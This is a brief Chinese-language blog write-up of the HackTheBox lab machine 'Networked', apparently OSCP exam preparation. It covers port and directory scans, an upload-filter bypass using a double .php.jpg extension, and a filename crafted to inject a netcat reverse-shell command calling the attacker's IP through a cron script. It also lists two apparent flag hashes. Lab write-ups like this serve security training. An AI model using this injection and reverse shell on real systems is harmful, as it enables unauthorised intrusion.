OSCP备考_0x15_HackThBox靶机_Linux_networked

Ethan医生5个月前 (06-30)靶场189

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)

nmap -sU --top-ports 100 10.129.204.201 (扫描UDP)

gobuster dir -u http://10.129.204.201/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

在backup里面有一个tar文件里面放着所有源代码,这边直接阅读代码后发现,只需要在.php后缀上添加.jpg即可以绕过

可以到home底下去查看有哪些用户和脚本使用

发现

发现有判断文件后删除的执行exec地方

/var/www/html/uploads底下创建

touch "; nc 10.10.16.31 1338 -c bash"

直接写入后三分钟后反弹SHELL

94d87600607d374fefe915de49df8507

8d3a2f3f49b5d5b243269c5e1e87aa9b

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.1...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

EthanDoctor